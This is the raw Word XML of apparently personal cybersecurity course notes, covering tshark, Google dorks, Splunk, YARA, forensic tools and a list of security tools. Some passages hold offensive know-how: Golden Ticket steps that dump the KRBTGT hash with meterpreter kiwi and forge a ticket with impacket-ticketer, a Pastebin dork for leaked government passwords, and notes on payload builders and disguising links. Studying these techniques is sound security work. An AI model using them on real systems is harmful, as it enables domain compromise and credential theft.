      </w:r>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 shows the header of the framee</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shark -r cap.pcap -Y  </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‘ip.src==10.10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source ip and http protocol</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-Y ‘http’ -T fields -e ‘ip.src’ – filter for http packets and get only their ip.src field</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–export-objects http,files_http – extract the files that received in http protocol and save them inside files_http directory</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-Y “frame.number==161” -T fields -e tcp.dstport -e udp.dstport – search for frame 161 and print the destination tcp and udp ports</w:t>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-r net.pcap -z conv,ip – show the statistics of conversations, ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A" w:rsidRDefault="00A27EB3"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-T fields -e ‘eth.addr’ | sed ‘s/,/ /g’ | awk ‘{for(i=1; i&lt;=NF; i++) {print $i}}’ | sort | uniq | wc – shows all the eth.src and eth.dst in groups of eth.src,eth.dst, then the sed switch the , in space, and the awk make all the two columns to one column, and the sort uniq and wc count the uniqe ethernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4"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90DAF" w14:textId="622ACA55" w:rsidR="0080350A" w:rsidRPr="00294C81" w:rsidRDefault="00294C81" w:rsidP="00294C8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dorks syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E2A7" w14:textId="77777777" w:rsidR="00090CBC" w:rsidRDefault="0080350A"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filetype: csv site: za budget – search for csv files from za area that has connection to the word “budget”, there is not : before the word “budget” so it make free search on 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site: Pastebin.com intext </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gov.il passwords – search in the site Pastebin.com words in the conext of gov.il passwords.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inurl – search inside url</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intitle – search inside title</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filetype – txt,csv, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6A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F6B0"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008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A36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253C"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CD7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253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Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253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create golden ticket we need 3 </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Domain Name</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SID</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KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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krbtgt account is a default service account in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icrosoft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irectory used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication process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64511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5"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domain name we can use nmap tool.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get SID we we can use 2 ways, but we need session to the machine for that.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can run the command whoami /user and find the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or we can use meterpreter session to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then use “dcsync_ntlm krbtgt”</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find in the output the SID, also the third thing we looked for, the NTLM hash.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 by running the next command we can create the golden ticket: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impacket-ticketer -nthash</w:t>
      </w:r>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-domain-sid </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 -domain … hack3r -dc-ip 10.10.10.10 – we need the insert the nthash we found, the SID we found, the name of the domain, the user</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want to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</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ip of the DC</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084B8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D540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A5606"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5C4DE"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C36E5"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86E2A"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3D3BE"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15994"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F56C2"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49260"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F1084"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1F01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72F47"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6835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ADEB9"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2E678" w14:textId="77777777" w:rsidR="002B6D73" w:rsidRDefault="002B6D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1852D" w14:textId="04728A13" w:rsidR="004A630B" w:rsidRPr="002B6D73" w:rsidRDefault="00BA230E" w:rsidP="004A630B">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Splunk</w:t>
      </w:r>
      <w:r w:rsidR="004A630B">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C978A" w14:textId="2B412FA2" w:rsidR="002B6D73" w:rsidRDefault="00AD4E61"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Splunk – splunk is a good tool that enable us to collect logs from computers and organize it in one place</w:t>
      </w:r>
      <w:r w:rsidR="00B913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comparing to elk, the free version of splunk is pretty limited, splunk more easier to install, splunk’s search is faster.</w:t>
      </w:r>
      <w:r w:rsidR="0071598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splunk use SPL language (search processing language) for quries</w:t>
      </w:r>
      <w:r w:rsidR="007E69A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its needed to install splunk on the main computer, and install the forwarder on the computers we want to collect the logs from, when installing the forwarder we need to choose the port and the ip the logs will sent into, and we need to choose which logs will sent (security, system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8089 enable us to edit configurations on the forwarder.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9997 forward all the data into splunk tool</w:t>
      </w:r>
      <w:r w:rsidR="00543B8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43B8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can add data by choose files, or </w:t>
      </w:r>
      <w:r w:rsidR="009C35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the forward for other computers success to send data to the main machine</w:t>
      </w:r>
      <w:r w:rsidR="007E69A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43B82" w:rsidRPr="00543B82">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F147C8F" wp14:editId="3E839037">
            <wp:extent cx="1518138" cy="1641349"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="99697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75192" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1537117" cy="1661868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E00A1A" w14:textId="1FBF360C" w:rsidR="004A630B" w:rsidRDefault="009C3587"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587">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891EBD" wp14:editId="05254CB4">
            <wp:extent cx="5197365" cy="1547446"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="147264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8253" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248312" cy="1562615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E8A96" w14:textId="77777777" w:rsidR="00D3008E" w:rsidRDefault="00D3008E"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EA591" w14:textId="040F84A8" w:rsidR="00D3008E" w:rsidRDefault="008B628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inputs – enable us to define which logs will save in splunk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forwarding and receiving – we need to set here the receiver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926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indexes – enable us to create new index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A87F2A" w14:textId="0D99810A" w:rsidR="00D3008E" w:rsidRPr="004A630B" w:rsidRDefault="00D3008E"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08E">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4F8252A" wp14:editId="32F821FE">
            <wp:extent cx="2356338" cy="1774774"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17565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197" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2362923" cy="1779734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65736E75" w14:textId="7ABEA698" w:rsidR="00D3008E" w:rsidRDefault="0059796B" w:rsidP="002E30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search for certain logs by define the time we are interested and by queris.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9796B">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E01473" wp14:editId="0AFA423F">
            <wp:extent cx="5741002" cy="597877"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76816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3379" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5771411" cy="601044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A03D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03D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process of rename field and advanced text manipulation</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need first to filter </w:t>
      </w:r>
      <w:r w:rsidR="003F154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all the logs we want to search in</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3C91"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B45A2C3" wp14:editId="43C98367">
            <wp:extent cx="3944815" cy="1260954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71539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92792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971617" cy="1269521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00542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54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 open one of the logs, choose event actions, and extract fields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3C91"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1B66F5" wp14:editId="7C04320E">
            <wp:extent cx="3951250" cy="1840523"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1362891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91974" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3982397" cy="1855031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B51EE1" w14:textId="025EAF0D" w:rsidR="00396E02" w:rsidRDefault="00396E02" w:rsidP="00B253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 choose which system, the common is delimeters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C282CCD" w14:textId="1A15D69E" w:rsidR="005E3C91" w:rsidRDefault="005E3C91" w:rsidP="00B253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D73CD8" wp14:editId="784E3659">
            <wp:extent cx="2919046" cy="1154826"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1011789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9390" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2987995" cy="1182103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C199C" w14:textId="4CB0B8DB" w:rsidR="00396E02" w:rsidRDefault="00396E02" w:rsidP="00B253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w:t>
      </w:r>
      <w:r w:rsidR="001350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how to separate each column, in our case space is the compatible char, then we can rename every field if we want</w:t>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if we called field15 “attackerip”</w:t>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can use this name in query:</w:t>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 | stats count by attackerip – combine and count all the duplicates ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C5B67" w14:textId="20BB5B1B" w:rsidR="002E305B" w:rsidRDefault="005E3C91" w:rsidP="002E30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8B9DDF1" wp14:editId="1C260F6A">
            <wp:extent cx="5590728" cy="1266092"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="355191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1577" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5611486" cy="1270793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002E30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AC74A8A" w14:textId="4623ED71" w:rsidR="002E305B" w:rsidRDefault="002E305B" w:rsidP="002E30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 choose which index to search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253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index=winlogs "eventcode=1102"</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by event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head – search the first 10 logs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failed – search logs containing the word “failed” ignoring case sensitivity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Index=mylogs failed 192.168.17.24 – search logs containing </w:t>
      </w:r>
      <w:r w:rsidRPr="00542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necessarily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strings but the words does not have to come in order or in a row</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source – filter for type of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 – filter for computername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“www*” – print all the logs which contains “www”</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stats count – count the number of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stats count by source – counts the line by unite and count how many of each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useragent=”*” – print all the logs which contains this field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 useragent=”*” – NOT does the opposite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where count &gt; 100 – print only the lines which contains more than 100 duplicates (this command after appropriate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 table field1, field2, field3 – output the data in table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dedup field1 – return only results which contains this field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C746ACF"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28D36"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8107C"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38068"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37758"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9413E"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212D1"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B2A6"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C0749"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3E3C8"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DAC84"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BADAA"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96F23"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FC258"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CD58E"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C6CC3"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0220D"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91890"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FE83F" w14:textId="238E22DF" w:rsidR="002B6D73" w:rsidRPr="002B6D73" w:rsidRDefault="002B6D73" w:rsidP="002B6D73">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tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B487813" w14:textId="7B44869A" w:rsidR="00A90AE7" w:rsidRDefault="00700CB9" w:rsidP="00700CB9">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Yara - </w:t>
      </w:r>
      <w:r w:rsidRP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is a tool used to search and identify files on a computer based on specific rules that describe patterns or characteristics those files might exhibit</w:t>
      </w:r>
      <w:r w:rsidR="0059796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snort check rules on traffic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yara contains </w:t>
      </w:r>
      <w:r w:rsid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main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6A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name</w:t>
      </w:r>
      <w:r w:rsid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metadata, Boolean conditions, string definitions</w:t>
      </w:r>
      <w:r w:rsid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56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extension of rule file is yar, for example rule1.yar</w:t>
      </w:r>
      <w:r w:rsidR="009B007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.yar file can contain few rules inside</w:t>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3CD2" w:rsidRP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/rules/y2_rule.yar OFTSJEJKP</w:t>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syntax is to write yara, choose the .yar file that contains the rules, and the file that you want to check it on, the output will contain all the rules were true</w:t>
      </w:r>
      <w:r w:rsidR="00E13C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all the rules are false, the output will be empt</w:t>
      </w:r>
      <w:r w:rsidR="00136B0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46F7E263" w14:textId="453FDC1F" w:rsidR="00BE6D2A" w:rsidRDefault="00BE6D2A" w:rsidP="00BE6D2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D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-r [rule file] [path to scan]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the if the rules met recursively in a directo</w:t>
      </w:r>
      <w:r w:rsidR="00C819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ry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA02CD8" w14:textId="58CA2931" w:rsidR="002B6D73" w:rsidRDefault="00A90AE7"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0A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yara ../rules/y2_rule.yar "$file"; done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which rules are met in </w:t>
      </w:r>
      <w:r w:rsidR="00475A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in the directory</w:t>
      </w:r>
      <w:r w:rsidR="009B007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syntax</w:t>
      </w:r>
      <w:r w:rsidR="00F837A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rule</w:t>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sidRPr="00700CB9">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B75446" wp14:editId="55952B32">
            <wp:extent cx="5274310" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="71038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0462" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2859405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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62B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name – ExampleMalwareDetection</w:t>
      </w:r>
      <w:r w:rsidR="00262B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meta – containd metadata as description of what the rules does, who is the author, date creation, and more for your </w:t>
      </w:r>
      <w:r w:rsidR="00F92FA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don’t have to write metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CEA01" w14:textId="05DF0A61" w:rsidR="00700CB9" w:rsidRDefault="00700CB9"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 – contain variables that contain data as pattern of hex values, or strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B7862" w14:textId="25DB581E" w:rsidR="00700CB9" w:rsidRDefault="00700CB9"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 contain the logical check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354AD9A" w14:textId="3D0AF02A" w:rsidR="001A6D10" w:rsidRDefault="001A6D10"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for rules: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A6D1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30C3BE" wp14:editId="00B5FF9B">
            <wp:extent cx="4460631" cy="2043964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2257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4613" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4477437" cy="2051665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="590FF457" w14:textId="088F24FE" w:rsidR="001A6D10" w:rsidRDefault="001A6D10" w:rsidP="001A6D1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the pattern </w:t>
      </w:r>
      <w:r w:rsidRP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89 50 4E 47 0D 0A 1A 0A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file for find hidden png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D07DB14" w14:textId="6440BF53" w:rsidR="009C77E4" w:rsidRDefault="001A6D10"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D1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CE2B87" wp14:editId="50B0A9E3">
            <wp:extent cx="5274310" cy="1423035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="121219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99279" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1423035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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9E5B667" w14:textId="77777777" w:rsidR="005324F1" w:rsidRDefault="001A6D10" w:rsidP="003E0CC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the string “</w:t>
      </w:r>
      <w:r w:rsidRP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malicious-site.com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no case sensitivity in the file</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strings:</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 “malicious” –  for search a string</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0CCB" w:rsidRP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 { 4D 5A }</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search pattern</w:t>
      </w:r>
      <w:r w:rsidR="00156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nocase – for ignore case sensitivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3BF58" w14:textId="43311ADC" w:rsidR="009C77E4" w:rsidRDefault="005324F1" w:rsidP="00162FA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 true only when $A rule is met </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0012" w:rsidRP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and $B</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only when both rules are met</w:t>
      </w:r>
      <w:r w:rsidR="00162F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62FAA" w:rsidRPr="00162F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or $B</w:t>
      </w:r>
      <w:r w:rsidR="00162F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ture if one of the rules is met</w:t>
      </w:r>
      <w:r w:rsidR="00C667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6798" w:rsidRP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$png_header</w:t>
      </w:r>
      <w:r w:rsidR="00C667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only if the pattern found in the file somewhere </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0012" w:rsidRP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$png_header at 0</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E166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when the header found in offset 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2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and $a2 and $a3 and ( 1 of ($a4, $a5)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532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rule is </w:t>
      </w:r>
      <w:r w:rsidR="00E166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532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when a1,a2,a3 are true and one or two of a4,a5 are true</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56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D42B39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1E4B6"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7D33A" w14:textId="3ACF1CCA" w:rsidR="00585246" w:rsidRDefault="00772D97" w:rsidP="00781E38">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EEF14B0" w14:textId="2B1569E5" w:rsidR="00585246" w:rsidRPr="00294C81" w:rsidRDefault="00585246" w:rsidP="0058524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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54598F2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OSForensics – common tool to investigate files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5DBC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Networkminer – good tool for investigate pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D50DC"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FTK imager – you can load to this tool file or vmdk files and investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB03C9E" w14:textId="2467BD1F"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 - You can load files to this tool and investigate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ctrl + G/F – for search inside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use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know hot to find a file by the extension name in the contrary of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possible to use the tool for search files inside the original file, as pdf files and more, find the blocks of header and trailer, copy all the blocks between them to new file and call this file with the appropriate extension then you could open the “hidden” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019617A3" w14:textId="754ED532" w:rsidR="00D360F5" w:rsidRDefault="00585246"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iewer – you can see all kind of activities that happen on the machine, we use that for watch on anomaly in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security field</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most used, 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use to see security stuff as log of users, when user fail to log, add user to domain, and more.</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 ctrl + f to search for strings (search even inside the events)</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also filter option of the tool to search for certain id event and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34AF3A" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="00D360F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 the place we define which kind of actions will appear in event viewer, we want the less we can for there will not be too much noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7459B7" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="002D17B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PEView – a tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="002D17B5"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Procmon – process monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4"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6DCD"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13A13"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94F50"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03C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70B1A"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9DF02"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194C"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D9925"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C88E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542C1"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15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D9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1A05E09" w14:textId="30083C46" w:rsidR="002D166C" w:rsidRPr="00294C81" w:rsidRDefault="006D0E34" w:rsidP="002D166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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B571" w14:textId="09806901" w:rsidR="00AD5A99" w:rsidRDefault="00806014"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root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4211B" w14:textId="3FCF809E" w:rsidR="0043077E" w:rsidRDefault="0043077E"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 – stores temporary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/home – where all the home directories of all the users are found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/var – variable data files such log files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/etc – local system configuration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/boot – files required to boot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 – contains a lot of commands as ls, rm and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F00AD" w14:textId="161C0A13" w:rsidR="005033DB" w:rsidRDefault="005033DB"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Authority/system – the strongest user in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1014" w14:textId="59C4EEF8" w:rsidR="00AD5A99" w:rsidRDefault="00D232D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irustotal – you can load file or url and it checks it hash to check if the file found problematic in the past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Any.run – you can scan virus through this site but oppose to virustotal, this site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58C68C" w14:textId="22602D43" w:rsidR="004A630B" w:rsidRDefault="004A630B" w:rsidP="004A6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I been pwned – the site purpose is to check if your email address is pwned, it check if your email address is found </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6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known data breaches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB67F"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cyberchef – site that helps in convertions of bases like from hex to binary, from base 64, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8226A"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crackstation – site for crack passwords, solve hashes a lot the john does not succeeds (on its default file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381950" w14:textId="77777777" w:rsidR="0088672A" w:rsidRDefault="00772D9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shodan – site for passive scans, its has its own syntax, os: or org: and hostname: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robots.txt – prevents index of google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18DDF" w14:textId="77777777" w:rsidR="003A39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 -I – tool that ask questions as the name of the dog and more for creates possible passwords, for install in you need to write “cupp” and enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A361" w14:textId="206C9C13" w:rsidR="001C0EBD" w:rsidRDefault="001C0EB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TheFatRat – tool for creating payloads, it also cooperate with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0F085" w14:textId="46CF7A92" w:rsidR="000E13AB" w:rsidRDefault="000E13A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Kerberute – tool for exploit the Kerberos protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334E083" w14:textId="5BF3F7A2" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1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Kessler – site that shows headers and trailers by type of files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18A9D1" w14:textId="7C448467" w:rsidR="00585246" w:rsidRDefault="00655DA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minutes mail – site that give you mail to use for 10 minutes, if you want to enter a site without to sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32914926" w14:textId="1AE4E311" w:rsidR="00540DD2" w:rsidRDefault="00540DD2"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tinyURL – site that get as input URL and output tiny URL, reduce the size of URL and enable us to make URL less suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D2B8" w14:textId="65023E98" w:rsidR="00B4458F" w:rsidRDefault="00B4458F"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file.io – a site that can host out file for temporary time (could use for transfer files between two machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298815D" w14:textId="6C20219C" w:rsidR="00A30CDC" w:rsidRDefault="00A30CDC"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certutil – tool that convert exe to bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB83F21" w14:textId="5EF8B1EC"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Glassdoor – anonymous criticism on hitech companies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC08BB" w14:textId="0113DE2F"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Hak5 – cool site that contains components for hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B55B29" w14:textId="5975E35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Viewdns.info – a site that get as input ip or domain and returns data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B699B" w14:textId="43B1944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Dorksearch.com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site that build the query of google dorks by the info you enter him about what you want to find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C2995" w14:textId="53FE5A6E"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 Hole – Ai for hackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76921AF4" w14:textId="6223F295" w:rsidR="005C6F18" w:rsidRDefault="005C6F18"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Htttrack – tool that can extract all the pages behind a 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httrack </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00F975F8">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https://www.johnbryce.co.il</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take all the pages behind this site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7B18" w14:textId="7DEE9B43" w:rsidR="00C23D7B" w:rsidRDefault="00C23D7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Blackbox – investigate as PT and get lil info as ip and subnet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greybox - investigate as PT and get mediocre info as ip domains urls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whitebox – investigate as PT and get a lot of info, even users sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34819" w14:textId="2379E350" w:rsidR="0043739B" w:rsidRDefault="0043739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OSINT – search info on internet in bare places (passive investiga</w:t>
      </w:r>
      <w:r w:rsidR="001806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3684E642" w14:textId="751DC585" w:rsidR="00032DDE" w:rsidRDefault="00032DDE"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 – tool for web scanning, you can use also brute force on a site using that tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F1178" w14:textId="64426AE5"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 – strong tool that scan similar to nmap but has its advantages and disadvantages</w:t>
      </w:r>
      <w:r w:rsid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002D4975" w14:textId="39164394" w:rsidR="00685BB6" w:rsidRDefault="00685BB6" w:rsidP="00685B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 – meaning smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBD374" w14:textId="7B1ECFCD" w:rsidR="00592E6C" w:rsidRDefault="00592E6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 when using recursion you need to put return sometimes in the right place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otherwise the function can continue again after it reached to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29C63" w14:textId="39198618" w:rsidR="00ED15CF" w:rsidRDefault="00ED15CF"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Pwsh/powershell – if write it in terminal or cmd, you can open powershell shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522FADD" w14:textId="52369397" w:rsidR="009A1845" w:rsidRDefault="009A1845"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difference between portable file or installer file is the installer you are install on the computer what take more time and you cant pass it with disk on key, and sometimes you don’t have the permissions to install in on the computer, but it found on the computer which have faster abilities and more comfortable to use, on the contrary the portable file is a file that can run without install permissions, and you can pass it on disk on key</w:t>
      </w:r>
      <w:r w:rsidR="000B0A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4091" w14:textId="23301916" w:rsidR="00897B79" w:rsidRPr="00897B79" w:rsidRDefault="00897B79"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enter inside share directory of windows we can write in linux in the place of path in the directory the path, like smb://10.10.10.10/c$/ then we will need to enter user and password and we can enter the directory</w:t>
      </w:r>
